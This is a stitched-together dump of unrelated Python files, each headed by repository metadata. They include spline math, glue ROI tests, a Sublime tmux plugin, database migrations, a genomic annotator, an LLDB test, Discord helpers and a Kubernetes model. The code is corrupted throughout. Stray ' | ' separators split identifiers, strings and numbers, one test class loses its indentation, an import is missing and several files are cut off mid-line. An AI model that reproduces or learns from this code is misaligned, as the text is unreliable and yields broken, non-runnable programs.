def cubic_spline_coeffs(p0, v0, p1, v1):
    """Return [a, b, c, d] for the cubic f(t) = a*t**3 + b*t**2 + c*t + d
    on t in [0, 1] satisfying f(0) = p0, f'(0) = v0, f(1) = p1, f'(1) = v1.

    (Derivation appears in the comment block at the top of this file.)
    BUGFIX: the original 'def' line was garbled by a stray ' | ' token.
    """
    d = p0
    c = v0
    b = -v1 + v0 + 3*(p1 - p0 - v0)
    a = p1 - p0 - v0 - b
    return [a,b,c,d]

def cubic_spline_coeffs_list(ps, vs):
    """Coefficient lists for each consecutive segment (ps[i], ps[i+1])
    with endpoint velocities (vs[i], vs[i+1])."""
    return [ cubic_spline_coeffs(ps[i], vs[i], ps[i+1], vs[i+1]) for i in range(len(ps)-1) ]
def cubic_spline(N, ps=None, vs=None, coeffs_list=None):
    """Sample a piecewise cubic spline at N values of t in [0, 1] per segment.

    Pass either endpoint positions/velocities (ps, vs) or precomputed
    per-segment coefficients via coeffs_list.  Returns an array of shape
    (dim, N * num_segments): segment samples concatenated, then transposed.
    """
    t = np.linspace(0,1,N)[np.newaxis].T
    if coeffs_list is None:
        coeffs_list = cubic_spline_coeffs_list(ps, vs)
    # Renamed from 'vs' so the parameter above is not shadowed; also
    # removed a stray separator line that had corrupted this body.
    segments = []
    for a, b, c, d in coeffs_list:
        segments.append(a*t**3 + b*t**2 + c*t + d)
    return np.concatenate(segments).T
if __name__ == "__main__":
    # Demo: plot one random 2-D spline through Np control points.
    import matplotlib.pyplot as plt
    Np = 4
    Nt = 100
    p = np.random.random((Np, 2))*2 - 1
    v = np.random.random((Np, 2))*2 - 1
    # BUGFIX: cubic_spline's signature is (N, ps, vs, ...); the original
    # call cubic_spline(p, v, Nt) passed the sample count and the control
    # points in the wrong positions.
    xy = cubic_spline(Nt, p, v)
    plt.plot(xy[0, :], xy[1, :])
    plt.show()
|
JudoWill/glue | glue/core/tests/test_roi.py | Python | bsd-3-clause | 29,076 | 0.000378 | #pylint: disable=I0011,W0613,W0201,W0212,E1101,E1103
from __future__ import absolute_import, division, print_function
import pytest
import numpy as np
from numpy.testing import assert_almost_equal
from matplotlib.figure import Figure
from glue.core.data import CategoricalComponent
from mock import MagicMock
from ..roi import (RectangularROI, UndefinedROI, CircularROI, PolygonalROI, CategoricalRoi,
MplCircularROI, MplRectangularROI, MplPolygonalROI, MplPickROI, PointROI,
XRangeROI, MplXRangeROI, YRangeROI, MplYRangeROI)
from .. import roi as r
FIG = Figure()
AXES = FIG.add_subplot(111)
class TestRectangle(object):
    """Behavioral tests for RectangularROI: definition, containment,
    polygon conversion, geometry accessors, and str()."""
    def setup_method(self, method):
        self.roi = RectangularROI()
    def test_empty_roi_contains_raises(self):
        with pytest.raises(UndefinedROI):
            self.roi.contains(1, 2)
    def test_scalar_contains(self):
        self.roi.update_limits(0, 0, 10, 10)
        assert self.roi.contains(5, 5)
        assert not self.roi.contains(11, 11)
    def test_reset(self):
        assert not self.roi.defined()
        self.roi.update_limits(0, 0, 10, 10)
        assert self.roi.defined()
        self.roi.reset()
        assert not self.roi.defined()
        with pytest.raises(UndefinedROI):
            self.roi.contains(5, 5)
    def test_empty_to_polygon(self):
        x, y = self.roi.to_polygon()
        assert x == []
        assert y == []
    def test_to_polygon(self):
        self.roi.update_limits(0, 0, 10, 10)
        x, y = self.roi.to_polygon()
        poly = PolygonalROI(vx=x, vy=y)
        assert poly.contains(5, 5)
    def test_ndarray(self):
        self.roi.update_limits(0, 0, 10, 10)
        x = np.array([5, 6, 2, 11])
        y = np.array([5, 11, 2, 11])
        result = self.roi.contains(x, y)
        assert result[0]
        assert not result[1]
        assert result[2]
        assert not result[3]
    def test_corner(self):
        self.roi.update_limits(6, 7, 10, 10)
        assert self.roi.corner() == (6, 7)
    def test_width(self):
        self.roi.update_limits(2, 2, 10, 12)
        assert self.roi.width() == 8
    # NOTE(review): the next two method definitions contain stray ' | '
    # tokens from a dataset separator; kept byte-identical here.
    def test_height( | self):
        self.roi.update_limits(2, 2, 10, 12)
        assert self.roi.height() == 10
    def test_multidim_ndarray(self):
        sel | f.roi.update_limits(0, 0, 10, 10)
        x = np.array([1, 2, 3, 4]).reshape(2, 2)
        y = np.array([1, 2, 3, 4]).reshape(2, 2)
        assert self.roi.contains(x, y).all()
        assert not self.roi.contains(x + 10, y).any()
        assert self.roi.contains(x, y).shape == x.shape
    def test_str_undefined(self):
        """ str method should not crash """
        assert type(str(self.roi)) == str
    def test_str_defined(self):
        """ str method should not crash """
        self.roi.update_limits(1, 2, 3, 4)
        assert type(str(self.roi)) == str
class TestXRange(object):
    """Behavioral tests for XRangeROI: an x-interval region ignoring y."""
    def test_undefined_on_init(self):
        assert not XRangeROI().defined()
    def test_str(self):
        roi = XRangeROI()
        assert str(roi) == "Undefined XRangeROI"
        roi.set_range(1, 2)
        assert str(roi) == "1.000 < x < 2.000"
    def test_reset(self):
        roi = XRangeROI()
        roi.set_range(1, 2)
        assert roi.defined()
        roi.reset()
        assert not roi.defined()
    def test_contains(self):
        roi = XRangeROI()
        roi.set_range(1, 3)
        x = np.array([0, 1, 2, 3])
        y = np.array([-np.inf, 100, 200, 0])
        # Only strictly-interior x values are contained; y is irrelevant.
        np.testing.assert_array_equal(roi.contains(x, y),
                                      [False, False, True, False])
    def test_contains_undefined(self):
        roi = XRangeROI()
        with pytest.raises(UndefinedROI):
            roi.contains(1, 2)
    def test_to_polygon(self):
        roi = XRangeROI()
        assert roi.to_polygon() == ([], [])
        roi.set_range(1, 2)
        x, y = roi.to_polygon()
        # The polygon is a vertical band spanning effectively all y.
        np.testing.assert_array_equal(x, [1, 2, 2, 1, 1])
        np.testing.assert_array_equal(y,
                                      [-1e100, -1e100, 1e100, 1e100, -1e100])
class TestYRange(object):
    """Behavioral tests for YRangeROI: a y-interval region ignoring x."""
    def test_undefined_on_init(self):
        assert not YRangeROI().defined()
    def test_str(self):
        roi = YRangeROI()
        assert str(roi) == "Undefined YRangeROI"
        roi.set_range(1, 2)
        assert str(roi) == "1.000 < y < 2.000"
    def test_reset(self):
        roi = YRangeROI()
        roi.set_range(1, 2)
        assert roi.defined()
        roi.reset()
        assert not roi.defined()
    def test_contains(self):
        roi = YRangeROI()
        roi.set_range(1, 3)
        y = np.array([0, 1, 2, 3])
        x = np.array([-np.inf, 100, 200, 0])
        # Only strictly-interior y values are contained; x is irrelevant.
        np.testing.assert_array_equal(roi.contains(x, y),
                                      [False, False, True, False])
    def test_contains_undefined(self):
        roi = YRangeROI()
        with pytest.raises(UndefinedROI):
            roi.contains(1, 2)
    def test_to_polygon(self):
        roi = YRangeROI()
        assert roi.to_polygon() == ([], [])
        roi.set_range(1, 2)
        x, y = roi.to_polygon()
        # The polygon is a horizontal band spanning effectively all x.
        np.testing.assert_array_equal(y, [1, 2, 2, 1, 1])
        np.testing.assert_array_equal(x,
                                      [-1e100, -1e100, 1e100, 1e100, -1e100])
class TestCircle(object):
    """Behavioral tests for CircularROI: center/radius definition,
    scalar and array containment, and polygon approximation."""
    def setup_method(self, method):
        self.roi = CircularROI()
    def test_undefined_on_creation(self):
        assert not self.roi.defined()
    def test_contains_on_undefined_contains_raises(self):
        with pytest.raises(UndefinedROI):
            self.roi.contains(1, 1)
    def test_set_center(self):
        self.roi.set_center(0, 0)
        self.roi.set_radius(1)
        assert self.roi.contains(0, 0)
        assert not self.roi.contains(2, 2)
        self.roi.set_center(2, 2)
        assert not self.roi.contains(0, 0)
        assert self.roi.contains(2, 2)
    def test_set_radius(self):
        self.roi.set_center(0, 0)
        self.roi.set_radius(1)
        assert not self.roi.contains(1.5, 0)
        self.roi.set_radius(5)
        assert self.roi.contains(1.5, 0)
    def test_contains_many(self):
        x = [0, 0, 0, 0, 0]
        y = [0, 0, 0, 0, 0]
        self.roi.set_center(0, 0)
        self.roi.set_radius(1)
        # Lists and ndarrays should behave identically.
        assert all(self.roi.contains(x, y))
        assert all(self.roi.contains(np.asarray(x), np.asarray(y)))
        assert not any(self.roi.contains(np.asarray(x) + 10, y))
    def test_poly(self):
        self.roi.set_center(0, 0)
        self.roi.set_radius(1)
        x, y = self.roi.to_polygon()
        poly = PolygonalROI(vx=x, vy=y)
        assert poly.contains(0, 0)
        assert not poly.contains(10, 0)
    def test_poly_undefined(self):
        x, y = self.roi.to_polygon()
        assert x == []
        assert y == []
    def test_reset(self):
        # Both a center and a radius are required before the ROI is defined.
        assert not self.roi.defined()
        self.roi.set_center(0, 0)
        assert not self.roi.defined()
        self.roi.set_radius(2)
        assert self.roi.defined()
        self.roi.reset()
        assert not self.roi.defined()
    def test_multidim(self):
        self.roi.set_center(0, 0)
        self.roi.set_radius(1)
        x = np.array([.1, .2, .3, .4]).reshape(2, 2)
        y = np.array([-.1, -.2, -.3, -.4]).reshape(2, 2)
        assert self.roi.contains(x, y).all()
        assert not self.roi.contains(x + 1, y).any()
        assert self.roi.contains(x, y).shape == (2, 2)
class TestPolygon(object):
def setup_method(self, method):
self.roi = PolygonalROI()
def define_as_square(self):
self.roi.reset()
assert not self.roi.defined()
self.roi.add_point(0, 0)
self.roi.add_point(0, 1)
self.roi.add_point(1, 1)
self.roi.add_point(1, 0)
assert self.roi.defined()
def test_contains_on_empty_raises(self):
with pytest.raises(UndefinedROI):
self.roi.contains(1, 2)
def test_remove_empty(self):
self.roi.remove_point(1, 0)
def test_replace(self):
self.define_as_square()
assert self.roi.contains(.9, .02)
self.roi.replace_last_point(0, 0)
assert not self.roi.conta |
huntie/sublime-tmux | tmux.py | Python | mit | 4,727 | 0.004019 | import sublime
import sublime_plugin
from datetime import datetime
import io
import os
import re
import subprocess
import sys
def get_setting(key, default=None):
    """Read a plugin setting, preferring the OS-specific settings file.

    Falls back to the shared 'tmux.sublime-settings' file, then *default*.
    """
    shared = sublime.load_settings('tmux.sublime-settings')
    if sys.platform == 'darwin':
        platform_file = 'tmux (OSX).sublime-settings'
    else:
        platform_file = 'tmux (Linux).sublime-settings'
    platform_settings = sublime.load_settings(platform_file)
    return platform_settings.get(key, shared.get(key, default))
class TmuxCommand():
    """Shared helpers for launching tmux windows/panes from Sublime commands.

    Subclasses set self.paths and call run_tmux(); this mixin handles session
    discovery, session selection, spawning and pane layout.
    """

    def resolve_file_path(self):
        """Directory of the active file, else the first project folder, else $HOME."""
        if self.window.active_view().file_name():
            return os.path.dirname(self.window.active_view().file_name())
        elif len(self.window.folders()):
            return self.window.folders()[0]
        else:
            sublime.status_message('tmux: Could not resolve file path - opening at home directory')
            return os.path.expanduser('~')

    def check_tmux_status(self):
        """Return True when a tmux server is reachable (`tmux info` exits 0)."""
        tmux_status = subprocess.Popen(['tmux', 'info'])
        tmux_status.wait()
        # BUGFIX: compare with ==; 'is' on int objects relies on CPython's
        # small-integer caching and is implementation-defined.
        return tmux_status.returncode == 0

    def get_active_tmux_sessions(self):
        """List sessions as dicts with name/windows/created/attached/width/height."""
        parts = ['name', 'windows', 'created', 'attached', 'width', 'height']
        list_sessions = subprocess.Popen([
            'tmux',
            'list-sessions',
            '-F',
            '#{session_' + '} #{session_'.join(parts) + '}'
        ], stdout=subprocess.PIPE)
        return [dict(zip(parts, line.strip().split(' '))) for line in io.TextIOWrapper(list_sessions.stdout)]

    def update_window_layout(self):
        """Re-arrange panes after a split according to the user's layout setting."""
        args = ['tmux', 'select-layout']
        if get_setting('arrange_panes_on_split') == 'even':
            args.append('even-' + ('horizontal' if '-h' in self.command_args else 'vertical'))
        else:
            args.append('tiled')
        if '-t' in self.command_args:
            args.extend(['-t', self.command_args[self.command_args.index('-t') + 1]])
        subprocess.Popen(args)

    def format_session_choices(self, sessions):
        """Quick-panel rows (name/windows, creation time, size) per session.

        BUGFIX: the lambda parameter name was garbled by stray ' | ' tokens
        in this copy of the file; reconstructed as 'session'.
        """
        return list(map(
            lambda session: [
                '{}: {} window{}'.format(session['name'], session['windows'], 's'[int(session['windows']) == 1:]),
                '{:%c}'.format(datetime.fromtimestamp(int(session['created']))),
                '{}x{}{}'.format(session['width'], session['height'], ' (attached)' if int(session['attached']) else '')
            ],
            sessions
        ))

    def on_session_selected(self, index):
        """Quick-panel callback: target the chosen session and run the command."""
        if index == -1:
            return
        self.command_args.extend(['-t', self.attached_sessions[index]['name'] + ':'])
        self.execute()

    def run_tmux(self, parameters, split):
        """Build the tmux new-window/split-window command and dispatch it."""
        try:
            if self.check_tmux_status():
                self.attached_sessions = list(filter(lambda x: int(x['attached']), self.get_active_tmux_sessions()))
                self.command_args = ['tmux', 'split-window' if split else 'new-window']
                self.command_args.extend(parameters)
                if split == 'horizontal':
                    self.command_args.append('-h')
                if len(self.attached_sessions) > 1:
                    # Several attached sessions: ask the user which to target.
                    return self.window.show_quick_panel(
                        self.format_session_choices(self.attached_sessions),
                        self.on_session_selected
                    )
                self.execute()
        except Exception as exception:
            sublime.error_message('tmux: ' + str(exception))

    def execute(self):
        """Run the prepared command once per target path; re-layout after splits."""
        try:
            for path in self.paths:
                subprocess.Popen(self.command_args + ['-c', path])
            if 'split-window' in self.command_args and get_setting('arrange_panes_on_split'):
                self.update_window_layout()
        except Exception as exception:
            sublime.error_message('tmux: ' + str(exception))
class OpenTmuxCommand(sublime_plugin.WindowCommand, TmuxCommand):
    """Open a tmux window/pane at the directory of each given path."""
    def run(self, paths=[], split=None):
        resolved = []
        for path in paths:
            # Files are mapped to their containing directory.
            resolved.append(path if os.path.isdir(path) else os.path.dirname(path))
        if not resolved:
            resolved.append(self.resolve_file_path())
        self.paths = resolved
        self.run_tmux([], split)
class OpenTmuxProjectFolderCommand(sublime_plugin.WindowCommand, TmuxCommand):
    """Open a tmux window/pane at the project folder containing the current file."""
    def run(self, split=None):
        target = self.resolve_file_path()
        # Prefer the first project folder that is a prefix of the resolved path.
        for folder in self.window.folders():
            if target.startswith(folder):
                target = folder
                break
        params = []
        if get_setting('set_project_window_name', True):
            # Name the new tmux window after the folder's basename.
            params.extend(['-n', target.split(os.sep)[-1]])
        self.paths = [target]
        self.run_tmux(params, split)
|
endthestart/photocontest | photocontest/photocontest/migrations/0009_auto__del_field_event_date.py | Python | mit | 2,554 | 0.007439 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South migration: drops the legacy 'date' column from photocontest_event.

    Irreversible: the dropped values cannot be restored, so backwards()
    raises immediately.
    """
    def forwards(self, orm):
        # Deleting field 'Event.date'
        db.delete_column(u'photocontest_event', 'date')
    def backwards(self, orm):
        # User chose to not deal with backwards NULL issues for 'Event.date'
        raise RuntimeError("Cannot reverse this migration. 'Event.date' and its values cannot be restored.")
        # The following (unreachable) code is provided here only to aid in
        # writing a correct migration: Adding field 'Event.date'.
        # NOTE(review): the field-path string below is corrupted by a stray
        # ' | '; presumably 'django.db.models.fields.DateField'.
        db.add_column(u'photocontest_event', 'date',
                      self.gf('django.db.models.f | ields.DateField')(),
                      keep_default=False)
    # Frozen ORM snapshot used by South when running this migration.
    models = {
        u'photocontest.event': {
            'Meta': {'object_name': 'Event'},
            'event_date': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        u'photocontest.photo': {
            'Meta': {'object_name': 'Photo'},
            'event': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['photocontest.Event']", 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'photo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'profile': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['photocontest.Profile']", 'null': 'True', 'blank': 'True'})
        },
        u'photocontest.profile': {
            'Meta': {'object_name': 'Profile'},
            'copyright': ('django.db.models.fields.TextField', [], {'max_length': '1000'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '255'}),
            'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'phone': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'})
        }
    }
    complete_apps = ['photocontest']
vivianbuan/cs3240-s15-team20 | SecureWitness/accounts/migrations/0006_auto_20150423_1615.py | Python | mit | 454 | 0 | # -*- coding: utf-8 - | *-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('accounts', '0005_auto_20150422_0105'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='key_expires',
field=models.DateTimeField(default=datetime.date(20 | 15, 4, 23)),
),
]
|
Genomon-Project/GenomonMutationAnnotator | lib/mutanno/annotator.py | Python | lgpl-3.0 | 2,295 | 0.009586 | import sys
import os
import re
import logging
import pysam
#
# Class definitions
#
class annotator:
def __init__(self, tabix_db, header, num | _output_column):
self.tabix_db = tabix_db
self.header = header
self.num_output_column = int(num_output_column)
def annotate(self, in_mutation_file, output):
tb = pysam.TabixFile(self.tabix_db)
# tabix open
srcfile = open(in_mutation_file,'r')
hResult = open(output,'w')
if self.header:
header = srcfile.readline().rstrip('\n')
header_array = self.header.split(',')
newheader = "\ | t".join(map(str,header_array))
print >> hResult, (header +"\t"+ newheader)
ori_result = ""
for num in range(self.num_output_column):
ori_result = ori_result + "---\t"
ori_result = ori_result[:-1]
for line in srcfile:
line = line.rstrip()
itemlist = line.split('\t')
# input file is annovar format (not zero-based number)
chr = itemlist[0]
start = (int(itemlist[1]) - 1)
end = int(itemlist[2])
ref = itemlist[3]
alt = itemlist[4]
chridx = chr.find('chr')
if chridx < 0:
chr = 'chr' + str(chr)
# tabix databese is a zero-based number
result = ori_result
try:
records = tb.fetch(chr, start, end)
for record_line in records:
record = record_line.split('\t')
ref_db = record[3]
alt_db = record[4]
if ref == ref_db and alt == alt_db:
result = record[5].replace(";;","\t")
except ValueError:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
logging.error( ("{0}: {1}:{2}".format( exc_type, fname, exc_tb.tb_lineno) ) )
print >> hResult, (line + "\t" + result)
continue
####
print >> hResult, (line + "\t" +result)
####
hResult.close()
srcfile.close()
tb.close()
|
haikentcode/haios | haios/setup.py | Python | mit | 356 | 0.008427 | from setuptools import setup
setup(name='haios',
version='0.1',
description='Image Se | arch Engine',
url='https://github.com/haikentcode/haios',
author='HITESH KUMAR REGAR (haikent)',
author_email='hiteshnitj16@gmail.com',
license='MIT',
packages=['descriptor','distance','spider','objects'],
z | ip_safe=False)
|
dchaplinsky/LT2OpenCorpora | lt2opencorpora/__init__.py | Python | mit | 121 | 0 | __version | __ = '2.0.3'
try:
from .convert import Dictionary
except ImportError:
# | To make setup.py work
pass
|
endlessm/chromium-browser | third_party/llvm/lldb/test/API/lang/objc/forward-decl/TestForwardDecl.py | Python | bsd-3-clause | 2,454 | 0.000815 | """Test that a forward-declared class works when its complete definition is in a library"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class ForwardDeclTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break inside main().
self.source = 'main.m'
self.line = line_number(self.source, '// Set breakpoint 0 here.')
self.shlib_names = ["Container"]
def do_test(self, dictionary=None):
self.build(dictionary=dictionary)
# Create a target by the debugger.
target = self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
self.assertTrue(target, VALID_TARGET)
# Create the breakpoint inside function 'main'.
breakpoint = target.BreakpointCreateByLocation(self.source, self.line)
self.assertTrue(breakpoint, VALID_BREAKPOINT)
# Register our shared libraries for remote targets so they get
# automatically uploaded
environment = self.registerSharedLibrariesWithTarget(
target, self.shlib_names)
# Now launch the process, and do not stop at entry point.
process = target.LaunchSimple(
None, environment, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
# The breakpoint should have a hit count of 1.
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs=[' resolved, hit count = 1'])
# This should display correctly.
self.expect("expression [j getMember]", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 0x"])
@skipUnlessDarwin
def test_expr(self):
self.do_test()
@no_ | debug_info_test
@skipUnlessDarwin
@skipIf(compiler=no_match("clang"))
@skipIf(compiler_version=["<", "7.0"])
def test_debug_names(self):
"""Test that we are able to find complete types when using DWARF v5
accelerator tables"""
self.do_test(
dict(CFLAGS_EXTRAS="-dwarf-version=5 -mllvm -accel-table | s=Dwarf"))
|
prospwro/odoo | addons/irsid_base/models/__init__.py | Python | agpl-3.0 | 1,032 | 0.000969 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 OpenERP SA (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# i | t under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU | Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import doc
import doc_signature
#import abstract_doc
|
pyspace/test | pySPACE/resources/dataset_defs/dummy.py | Python | gpl-3.0 | 1,581 | 0.011385 | """ Store only meta data but no real data (except from store state of nodes) """
import logging
import os
import pwd
import yaml
from pySPACE.resources.dataset_defs.base import BaseDataset
class DummyDataset(BaseDataset):
""" Class to store only meta data of collection
This class overrides the 'store' method
in a way that only the collection meta data files are stored | .
This type is intended to be passed to pySPACE as a result
by the NilSinkNode.
**Parameters**
:dataset_md:
The meta data of | the current dataset.
(*optional, default: None*)
:Author: David Feess (david.feess@dfki.de)
:Created: 2010/03/30
"""
def __init__(self, dataset_md = None):
super(DummyDataset, self).__init__(dataset_md = dataset_md)
def store(self, result_dir, s_format = "None"):
if not s_format == "None":
self._log("The format %s is not supported!"%s_format, level=logging.CRITICAL)
return
# Update the meta data
try:
author = pwd.getpwuid(os.getuid())[4]
except:
author = "unknown"
self._log("Author could not be resolved.",level=logging.WARNING)
self.update_meta_data({"type": "only output of individual nodes stored",
"storage_format": s_format,
"author" : author,
"data_pattern": "no data stored"})
# Store meta data
BaseDataset.store_meta_data(result_dir,self.meta_data) |
StarbotDiscord/Starbot | libs/displayname.py | Python | apache-2.0 | 6,488 | 0.013255 | # Copyright (c) 2017 CorpNewt
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
import discord
def name(member : discord.Member):
# A helper function to return the member's display name
nick = name = None
try:
nick = member.nick
except AttributeError:
pass
try:
name = member.name
except AttributeError:
pass
if nick:
return nick
if name:
return name
return None
def memberForID(id, members, me):
# Check self first.
if me.id == id:
return me
# Check other members.
for member in members:
if member.id == id:
return member
return None
def memberForName(name, members, me):
# Check self first.
if me.display_name.lower() == name.lower():
return me
# Check rest of members.
for member in members:
if member.display_name.lower() == name.lower():
return member
# No member yet - try ID
memID = ''.join(list(filter(str.isdigit, name)))
newMem = memberForID(memID, members, me)
if newMem:
return newMem
return None
def roleForID(id, server):
for role in server.roles:
if role.id == id:
return role
return None
def roleForName(name, server):
for role in server.roles:
if role.name.lower() == name.lower():
return role
# No role yet - try ID
roleID = ''.join(list(filter(str.isdigit, name)))
newRole = roleForID(roleID, server)
if newRole:
return newRole
return None
def serverNick(user, server):
for member in server.members:
if member.id == user.id:
return name(member)
return None
def checkNameForInt(name, server):
theList = name.split()
# We see if we have multiple parts split by a space
if len(theList)<2:
# Only one part - no int included (or not separated by space)
# Check if member exists - and if not throw an error, if so, throw a diff error
amember = memberForName(name, server)
if amember:
# We at least have a member
return { "Member" : amember, "Int" : None }
else:
# Now we check if we got an ID instead
# Get just the numbers
memID = ''.join(list(filter(str.isdigit, name)))
newMem = memberForID(memID, server)
if newMem:
# We FOUND it!
return { "Member" : newMem, "Int" : None }
else:
# Nothing was right about this...
return { "Member" : None, "Int" : None }
try:
# Let's cast the last item as an int and catch any exceptions
theInt = int(theList[len(theList)-1])
newMemberName = " ".join(theList[:-1])
amember = memberForName(newMemberName, server)
if amember:
return { "Member" : amember, "Int" : theInt }
else:
# Now we check if we got an ID instead
# Get just the numbers
memID = ''.join(list(filter(str.isdigit, newMemberName)))
newMem = memberForID(memID, server)
if newMem:
# We FOUND it!
return { "Member" : newMem, "Int" : theInt }
else:
# Nothing was right about this...
return { "Member" : None, "Int" : None }
except ValueError:
# Last section wasn't an int
amember = memberForName(name, server)
if amember:
# Name was just a member - return
return { "Member" : amember, "Int" : None }
else:
# Now we check if we got an ID instead
# Get just the numbers
memID = ''.join(list(filter(str.isdigit, name)))
newMem = memberForID(memID, server)
if newMem:
# We FOUND it!
return { "Member" : newMem, "Int" : None }
else:
# Nothing was right about this...
return { "Member" : None, "Int" : None }
# Should never get here
return None
def checkRoleForInt(name, server):
theList = name.split()
# We see if we have multiple parts split by a space
if len(theList)<2:
# Only one part - no int included (or not separated by space)
# Check if role exists - and if not throw an error, if so, throw a diff error
amember = roleForName(name, server)
if amember:
# We at least have a member
return { "Role" : amember, "Int" : None }
else:
# Now we check if we got an ID instead
# Get just the numbers
memID = ''.join(list(filter(str.isdigit, name)))
newMem = roleForID(memID, server)
if newMem:
# We FOUND it!
return { "Role" : newMem, "Int" : None }
else:
# Nothing was right about this...
return { "Role" : None, "Int" : None }
try:
# Let's cast the last item as an int and catch any exceptions
theInt = int(theList[len(theList)-1])
newMemberName = " ".join(theList[:-1])
amember = roleForName(newMemberName, server)
if amember:
return { "Role" : amember, "Int" : theInt }
else:
# Now we check if we got an ID instead
# Get just the numbers
memID = ''.join(list(filter(str.isdigit, newMemberName)))
newMem = roleForID(memID, server)
| if newMem:
# We FOUND it!
return { "Role" : newMem, "Int" : theInt }
else:
# Nothing was right about this...
return { "Role" : None, "Int" : None }
except ValueError:
# Last section wasn't an int
amember = roleForName(name, server)
if amember:
# Name was just a role - return
return { "Role" : amember, "Int" : None }
else:
# Now we ch | eck if we got an ID instead
# Get just the numbers
memID = ''.join(list(filter(str.isdigit, name)))
newMem = roleForID(memID, server)
if newMem:
# We FOUND it!
return { "Role" : newMem, "Int" : None }
else:
# Nothing was right about this...
return { "Role" : None, "Int" : None }
# Should never get here
return None
|
mbohlool/client-python | kubernetes/client/models/v1_group_version_for_discovery.py | Python | apache-2.0 | 4,487 | 0.002006 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1GroupVersionForDiscovery(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes: |
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'group_version': 'str',
'version': 'str'
}
attribute_map = {
'group_version': 'groupVersion',
'version': 'version'
| }
def __init__(self, group_version=None, version=None):
"""
V1GroupVersionForDiscovery - a model defined in Swagger
"""
self._group_version = None
self._version = None
self.discriminator = None
self.group_version = group_version
self.version = version
@property
def group_version(self):
"""
Gets the group_version of this V1GroupVersionForDiscovery.
groupVersion specifies the API group and version in the form \"group/version\"
:return: The group_version of this V1GroupVersionForDiscovery.
:rtype: str
"""
return self._group_version
@group_version.setter
def group_version(self, group_version):
"""
Sets the group_version of this V1GroupVersionForDiscovery.
groupVersion specifies the API group and version in the form \"group/version\"
:param group_version: The group_version of this V1GroupVersionForDiscovery.
:type: str
"""
if group_version is None:
raise ValueError("Invalid value for `group_version`, must not be `None`")
self._group_version = group_version
@property
def version(self):
"""
Gets the version of this V1GroupVersionForDiscovery.
version specifies the version in the form of \"version\". This is to save the clients the trouble of splitting the GroupVersion.
:return: The version of this V1GroupVersionForDiscovery.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""
Sets the version of this V1GroupVersionForDiscovery.
version specifies the version in the form of \"version\". This is to save the clients the trouble of splitting the GroupVersion.
:param version: The version of this V1GroupVersionForDiscovery.
:type: str
"""
if version is None:
raise ValueError("Invalid value for `version`, must not be `None`")
self._version = version
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1GroupVersionForDiscovery):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
ludobox/ludobox | server/tests/test_routes_api.py | Python | agpl-3.0 | 9,003 | 0.00411 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import json
from ludobox.content import read_content
from ludobox.routes.api import rest_api
